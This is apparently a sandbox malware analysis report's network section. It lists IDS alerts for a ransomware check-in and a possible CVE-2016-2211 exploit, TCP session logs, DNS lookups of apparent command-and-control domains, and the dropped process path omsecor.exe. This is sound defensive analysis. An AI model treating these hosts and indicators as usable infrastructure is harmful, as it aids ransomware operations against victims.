                                                                                                                                                                                                              2024-11-01T16:22:39.356294+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.64987915.197.204.5680TCP
                                                                                                                                                                                                              2024-11-01T16:22:40.327774+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.64988552.34.198.22980TCP
                                                                                                                                                                                                              2024-11-01T16:22:48.943456+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.649891193.166.255.17180TCP
                                                                                                                                                                                                              2024-11-01T16:22:57.393256+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.649973TCP
                                                                                                                                                                                                              2024-11-01T16:22:57.731117+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.649938193.166.255.17180TCP
                                                                                                                                                                                                              2024-11-01T16:22:58.006313+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.64987915.197.204.5680TCP
                                                                                                                                                                                                              2024-11-01T16:22:58.961028+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.64998352.34.198.22980TCP
                                                                                                                                                                                                              2024-11-01T16:23:07.664946+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.649989193.166.255.17180TCP
                                                                                                                                                                                                              2024-11-01T16:23:16.258859+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.649995193.166.255.17180TCP
                                                                                                                                                                                                              2024-11-01T16:23:16.999344+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.64999615.197.204.5680TCP
                                                                                                                                                                                                              2024-11-01T16:23:17.946497+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.64999752.34.198.22980TCP
                                                                                                                                                                                                              2024-11-01T16:23:26.666239+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.649998193.166.255.17180TCP
                                                                                                                                                                                                              2024-11-01T16:23:35.272306+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.649999193.166.255.17180TCP
                                                                                                                                                                                                              2024-11-01T16:23:36.587988+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.65000115.197.204.5680TCP
                                                                                                                                                                                                              2024-11-01T16:23:37.569661+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.65000252.34.198.22980TCP
                                                                                                                                                                                                              2024-11-01T16:23:46.286758+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.650003193.166.255.17180TCP
                                                                                                                                                                                                              2024-11-01T16:23:55.051681+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.650004193.166.255.17180TCP
                                                                                                                                                                                                              2024-11-01T16:23:55.834896+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.65000515.197.204.5680TCP
                                                                                                                                                                                                              2024-11-01T16:23:56.826488+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.65000652.34.198.22980TCP
                                                                                                                                                                                                              2024-11-01T16:24:05.543153+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.650007193.166.255.17180TCP
                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                              Nov 1, 2024 16:22:01.694283009 CET4970980192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:01.699266911 CET8049709193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:01.699348927 CET4970980192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:01.699565887 CET4970980192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:01.704411983 CET8049709193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:10.199237108 CET8049709193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:10.199353933 CET4970980192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:10.199753046 CET4970980192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:10.204626083 CET8049709193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:10.315309048 CET4972780192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:10.320950031 CET8049727193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:10.321176052 CET4972780192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:10.321299076 CET4972780192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:10.326160908 CET8049727193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:18.801827908 CET8049727193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:18.801892042 CET4972780192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:18.802819014 CET4972780192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:18.808285952 CET8049727193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:18.946409941 CET4976980192.168.2.615.197.204.56
                                                                                                                                                                                                              Nov 1, 2024 16:22:18.951695919 CET804976915.197.204.56192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:18.951946020 CET4976980192.168.2.615.197.204.56
                                                                                                                                                                                                              Nov 1, 2024 16:22:18.951946020 CET4976980192.168.2.615.197.204.56
                                                                                                                                                                                                              Nov 1, 2024 16:22:18.956809044 CET804976915.197.204.56192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:19.623764038 CET804976915.197.204.56192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:19.623900890 CET4976980192.168.2.615.197.204.56
                                                                                                                                                                                                              Nov 1, 2024 16:22:19.931107044 CET4977680192.168.2.652.34.198.229
                                                                                                                                                                                                              Nov 1, 2024 16:22:19.936481953 CET804977652.34.198.229192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:19.936592102 CET4977680192.168.2.652.34.198.229
                                                                                                                                                                                                              Nov 1, 2024 16:22:19.936713934 CET4977680192.168.2.652.34.198.229
                                                                                                                                                                                                              Nov 1, 2024 16:22:19.941548109 CET804977652.34.198.229192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:20.790091991 CET804977652.34.198.229192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:20.790141106 CET4977680192.168.2.652.34.198.229
                                                                                                                                                                                                              Nov 1, 2024 16:22:20.910666943 CET804977652.34.198.229192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:20.910723925 CET4977680192.168.2.652.34.198.229
                                                                                                                                                                                                              Nov 1, 2024 16:22:21.014872074 CET4977680192.168.2.652.34.198.229
                                                                                                                                                                                                              Nov 1, 2024 16:22:21.019705057 CET804977652.34.198.229192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:21.334338903 CET4976980192.168.2.615.197.204.56
                                                                                                                                                                                                              Nov 1, 2024 16:22:21.372437000 CET4978880192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:21.377631903 CET8049788193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:21.377721071 CET4978880192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:21.379038095 CET4978880192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:21.383939981 CET8049788193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:29.862993956 CET8049788193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:29.863054037 CET4978880192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:29.881849051 CET4978880192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:29.886674881 CET8049788193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:30.098277092 CET4983080192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:30.103286028 CET8049830193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:30.103346109 CET4983080192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:30.121573925 CET4983080192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:30.126328945 CET8049830193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:38.613482952 CET8049830193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:38.613595963 CET4983080192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:38.613682032 CET4983080192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:38.623114109 CET8049830193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:38.722513914 CET4987980192.168.2.615.197.204.56
                                                                                                                                                                                                              Nov 1, 2024 16:22:38.728853941 CET804987915.197.204.56192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:38.728940964 CET4987980192.168.2.615.197.204.56
                                                                                                                                                                                                              Nov 1, 2024 16:22:38.729095936 CET4987980192.168.2.615.197.204.56
                                                                                                                                                                                                              Nov 1, 2024 16:22:38.735745907 CET804987915.197.204.56192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:39.356230974 CET804987915.197.204.56192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:39.356293917 CET4987980192.168.2.615.197.204.56
                                                                                                                                                                                                              Nov 1, 2024 16:22:39.473020077 CET4988580192.168.2.652.34.198.229
                                                                                                                                                                                                              Nov 1, 2024 16:22:39.478363991 CET804988552.34.198.229192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:39.478429079 CET4988580192.168.2.652.34.198.229
                                                                                                                                                                                                              Nov 1, 2024 16:22:39.478585005 CET4988580192.168.2.652.34.198.229
                                                                                                                                                                                                              Nov 1, 2024 16:22:39.483625889 CET804988552.34.198.229192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:40.327507973 CET804988552.34.198.229192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:40.327774048 CET4988580192.168.2.652.34.198.229
                                                                                                                                                                                                              Nov 1, 2024 16:22:40.328604937 CET4988580192.168.2.652.34.198.229
                                                                                                                                                                                                              Nov 1, 2024 16:22:40.333887100 CET804988552.34.198.229192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:40.334078074 CET4988580192.168.2.652.34.198.229
                                                                                                                                                                                                              Nov 1, 2024 16:22:40.458249092 CET4989180192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:40.463155985 CET8049891193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:40.463218927 CET4989180192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:40.463457108 CET4989180192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:40.468452930 CET8049891193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:48.943344116 CET8049891193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:48.943455935 CET4989180192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:48.943556070 CET4989180192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:48.948431015 CET8049891193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:49.048841953 CET4993880192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:49.244505882 CET8049938193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:49.244627953 CET4993880192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:49.244889975 CET4993880192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:49.250520945 CET8049938193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:57.730891943 CET8049938193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:57.731117010 CET4993880192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:57.731396914 CET4993880192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:57.737569094 CET8049938193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:57.845740080 CET4987980192.168.2.615.197.204.56
                                                                                                                                                                                                              Nov 1, 2024 16:22:57.851000071 CET804987915.197.204.56192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:58.006225109 CET804987915.197.204.56192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:58.006313086 CET4987980192.168.2.615.197.204.56
                                                                                                                                                                                                              Nov 1, 2024 16:22:58.111692905 CET4998380192.168.2.652.34.198.229
                                                                                                                                                                                                              Nov 1, 2024 16:22:58.116714954 CET804998352.34.198.229192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:58.116844893 CET4998380192.168.2.652.34.198.229
                                                                                                                                                                                                              Nov 1, 2024 16:22:58.116975069 CET4998380192.168.2.652.34.198.229
                                                                                                                                                                                                              Nov 1, 2024 16:22:58.122034073 CET804998352.34.198.229192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:58.960884094 CET804998352.34.198.229192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:58.961028099 CET4998380192.168.2.652.34.198.229
                                                                                                                                                                                                              Nov 1, 2024 16:22:58.961680889 CET4998380192.168.2.652.34.198.229
                                                                                                                                                                                                              Nov 1, 2024 16:22:58.967068911 CET804998352.34.198.229192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:58.967174053 CET4998380192.168.2.652.34.198.229
                                                                                                                                                                                                              Nov 1, 2024 16:22:59.164309025 CET4998980192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:59.171665907 CET8049989193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:59.171740055 CET4998980192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:59.171910048 CET4998980192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:59.179641008 CET8049989193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:59.198824883 CET4987980192.168.2.615.197.204.56
                                                                                                                                                                                                              Nov 1, 2024 16:23:07.664866924 CET8049989193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:07.664946079 CET4998980192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:23:07.665075064 CET4998980192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:23:07.671092987 CET8049989193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:07.770239115 CET4999580192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:23:07.775208950 CET8049995193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:07.775275946 CET4999580192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:23:07.775427103 CET4999580192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:23:07.781164885 CET8049995193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:16.258625031 CET8049995193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:16.258858919 CET4999580192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:23:16.258964062 CET4999580192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:23:16.263895988 CET8049995193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:16.363836050 CET4999680192.168.2.615.197.204.56
                                                                                                                                                                                                              Nov 1, 2024 16:23:16.368704081 CET804999615.197.204.56192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:16.368832111 CET4999680192.168.2.615.197.204.56
                                                                                                                                                                                                              Nov 1, 2024 16:23:16.369029999 CET4999680192.168.2.615.197.204.56
                                                                                                                                                                                                              Nov 1, 2024 16:23:16.373948097 CET804999615.197.204.56192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:16.998203993 CET804999615.197.204.56192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:16.999344110 CET4999680192.168.2.615.197.204.56
                                                                                                                                                                                                              Nov 1, 2024 16:23:17.113670111 CET4999780192.168.2.652.34.198.229
                                                                                                                                                                                                              Nov 1, 2024 16:23:17.118648052 CET804999752.34.198.229192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:17.118756056 CET4999780192.168.2.652.34.198.229
                                                                                                                                                                                                              Nov 1, 2024 16:23:17.118930101 CET4999780192.168.2.652.34.198.229
                                                                                                                                                                                                              Nov 1, 2024 16:23:17.123893976 CET804999752.34.198.229192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:17.946367025 CET804999752.34.198.229192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:17.946496964 CET4999780192.168.2.652.34.198.229
                                                                                                                                                                                                              Nov 1, 2024 16:23:17.947376966 CET4999780192.168.2.652.34.198.229
                                                                                                                                                                                                              Nov 1, 2024 16:23:17.953336000 CET804999752.34.198.229192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:17.953429937 CET4999780192.168.2.652.34.198.229
                                                                                                                                                                                                              Nov 1, 2024 16:23:18.174122095 CET4999880192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:23:18.178965092 CET8049998193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:18.179079056 CET4999880192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:23:18.179202080 CET4999880192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:23:18.184884071 CET8049998193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:26.666126966 CET8049998193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:26.666239023 CET4999880192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:23:26.666894913 CET4999880192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:23:26.671761990 CET8049998193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:26.783461094 CET4999980192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:23:26.788388968 CET8049999193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:26.788496971 CET4999980192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:23:26.788692951 CET4999980192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:23:26.793488979 CET8049999193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:35.272134066 CET8049999193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:35.272305965 CET4999980192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:23:35.584564924 CET4999980192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:23:35.589785099 CET8049999193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:35.704993963 CET4999680192.168.2.615.197.204.56
                                                                                                                                                                                                              Nov 1, 2024 16:23:35.705331087 CET5000180192.168.2.615.197.204.56
                                                                                                                                                                                                              Nov 1, 2024 16:23:35.949032068 CET805000115.197.204.56192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:35.949049950 CET804999615.197.204.56192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:35.949227095 CET4999680192.168.2.615.197.204.56
                                                                                                                                                                                                              Nov 1, 2024 16:23:35.949491024 CET5000180192.168.2.615.197.204.56
                                                                                                                                                                                                              Nov 1, 2024 16:23:35.949491024 CET5000180192.168.2.615.197.204.56
                                                                                                                                                                                                              Nov 1, 2024 16:23:35.954333067 CET805000115.197.204.56192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:36.587837934 CET805000115.197.204.56192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:36.587987900 CET5000180192.168.2.615.197.204.56
                                                                                                                                                                                                              Nov 1, 2024 16:23:36.707745075 CET5000280192.168.2.652.34.198.229
                                                                                                                                                                                                              Nov 1, 2024 16:23:36.712996006 CET805000252.34.198.229192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:36.713123083 CET5000280192.168.2.652.34.198.229
                                                                                                                                                                                                              Nov 1, 2024 16:23:36.713290930 CET5000280192.168.2.652.34.198.229
                                                                                                                                                                                                              Nov 1, 2024 16:23:36.718462944 CET805000252.34.198.229192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:37.569514036 CET805000252.34.198.229192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:37.569660902 CET5000280192.168.2.652.34.198.229
                                                                                                                                                                                                              Nov 1, 2024 16:23:37.570275068 CET5000280192.168.2.652.34.198.229
                                                                                                                                                                                                              Nov 1, 2024 16:23:37.575691938 CET805000252.34.198.229192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:37.575784922 CET5000280192.168.2.652.34.198.229
                                                                                                                                                                                                              Nov 1, 2024 16:23:37.785546064 CET5000380192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:23:37.790853024 CET8050003193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:37.791059017 CET5000380192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:23:37.791393042 CET5000380192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:23:37.796550035 CET8050003193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:46.286544085 CET8050003193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:46.286757946 CET5000380192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:23:46.286849022 CET5000380192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:23:46.292210102 CET8050003193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:46.394058943 CET5000480192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:23:46.399414062 CET8050004193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:46.399585009 CET5000480192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:23:46.399684906 CET5000480192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:23:46.404730082 CET8050004193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:55.051572084 CET8050004193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:55.051681042 CET5000480192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:23:55.051805973 CET5000480192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:23:55.061794043 CET8050004193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:55.160034895 CET5000180192.168.2.615.197.204.56
                                                                                                                                                                                                              Nov 1, 2024 16:23:55.160506010 CET5000580192.168.2.615.197.204.56
                                                                                                                                                                                                              Nov 1, 2024 16:23:55.165766001 CET805000515.197.204.56192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:55.165920019 CET5000580192.168.2.615.197.204.56
                                                                                                                                                                                                              Nov 1, 2024 16:23:55.166052103 CET5000580192.168.2.615.197.204.56
                                                                                                                                                                                                              Nov 1, 2024 16:23:55.166197062 CET805000115.197.204.56192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:55.166510105 CET5000180192.168.2.615.197.204.56
                                                                                                                                                                                                              Nov 1, 2024 16:23:55.171382904 CET805000515.197.204.56192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:55.834677935 CET805000515.197.204.56192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:55.834896088 CET5000580192.168.2.615.197.204.56
                                                                                                                                                                                                              Nov 1, 2024 16:23:55.984436989 CET5000680192.168.2.652.34.198.229
                                                                                                                                                                                                              Nov 1, 2024 16:23:55.989382982 CET805000652.34.198.229192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:55.989495993 CET5000680192.168.2.652.34.198.229
                                                                                                                                                                                                              Nov 1, 2024 16:23:55.993933916 CET5000680192.168.2.652.34.198.229
                                                                                                                                                                                                              Nov 1, 2024 16:23:55.998883009 CET805000652.34.198.229192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:56.826276064 CET805000652.34.198.229192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:56.826488018 CET5000680192.168.2.652.34.198.229
                                                                                                                                                                                                              Nov 1, 2024 16:23:56.827167034 CET5000680192.168.2.652.34.198.229
                                                                                                                                                                                                              Nov 1, 2024 16:23:56.833173990 CET805000652.34.198.229192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:56.833265066 CET5000680192.168.2.652.34.198.229
                                                                                                                                                                                                              Nov 1, 2024 16:23:57.049094915 CET5000780192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:23:57.054111958 CET8050007193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:57.054290056 CET5000780192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:23:57.054321051 CET5000780192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:23:57.059246063 CET8050007193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:24:05.543088913 CET8050007193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:24:05.543153048 CET5000780192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:24:05.544028997 CET5000780192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:24:05.548784018 CET8050007193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:24:05.681745052 CET5000980192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:24:05.688043118 CET8050009193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:24:05.688153028 CET5000980192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:24:05.688517094 CET5000980192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:24:05.694778919 CET8050009193.166.255.171192.168.2.6
                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                              Nov 1, 2024 16:22:01.499181032 CET5143853192.168.2.61.1.1.1
                                                                                                                                                                                                              Nov 1, 2024 16:22:01.686541080 CET53514381.1.1.1192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:18.910053015 CET5366853192.168.2.61.1.1.1
                                                                                                                                                                                                              Nov 1, 2024 16:22:18.944542885 CET53536681.1.1.1192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:19.737744093 CET5685753192.168.2.61.1.1.1
                                                                                                                                                                                                              Nov 1, 2024 16:22:19.930011988 CET53568571.1.1.1192.168.2.6
                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                              Nov 1, 2024 16:22:01.499181032 CET192.168.2.61.1.1.10xe98cStandard query (0)lousta.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 1, 2024 16:22:18.910053015 CET192.168.2.61.1.1.10xb18fStandard query (0)mkkuei4kdsz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 1, 2024 16:22:19.737744093 CET192.168.2.61.1.1.10xd36bStandard query (0)ow5dirasuek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                              Nov 1, 2024 16:22:01.686541080 CET1.1.1.1192.168.2.60xe98cNo error (0)lousta.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 1, 2024 16:22:18.944542885 CET1.1.1.1192.168.2.60xb18fNo error (0)mkkuei4kdsz.com15.197.204.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 1, 2024 16:22:18.944542885 CET1.1.1.1192.168.2.60xb18fNo error (0)mkkuei4kdsz.com3.33.243.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 1, 2024 16:22:19.930011988 CET1.1.1.1192.168.2.60xd36bNo error (0)ow5dirasuek.com52.34.198.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                              • lousta.net
                                                                                                                                                                                                              • mkkuei4kdsz.com
                                                                                                                                                                                                              • ow5dirasuek.com
                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              0192.168.2.649709193.166.255.171803756C:\Users\user\AppData\Roaming\omsecor.exe
